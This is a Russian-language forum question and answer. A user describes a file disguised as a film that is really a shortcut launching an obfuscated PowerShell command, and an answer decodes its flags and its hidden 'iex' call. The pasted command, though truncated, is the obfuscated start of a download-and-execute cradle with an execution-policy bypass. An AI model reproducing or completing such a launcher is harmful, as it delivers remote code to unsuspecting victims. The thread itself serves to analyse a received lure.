Я получил файл, который должен был быть фильмом, но оказался ярлыком для выполнения команды powershell. Детали:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.

Может кто-нибудь посоветовать, что будет делать эта команда powershell или где я могу найти детали того, как ее декодировать?

Спасибо

|источник

1 ответ1

2

powershell.exe -NoPr -WINd 1 -eXEc ByP is powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass

Команда, которую пытается выполнить $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'' , фактически является iex что является псевдонимом Invoke-Expression

Я полагаю, что вы пропустили часть командной строки, поэтому трудно сказать, что означает остальная часть.

|источник

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .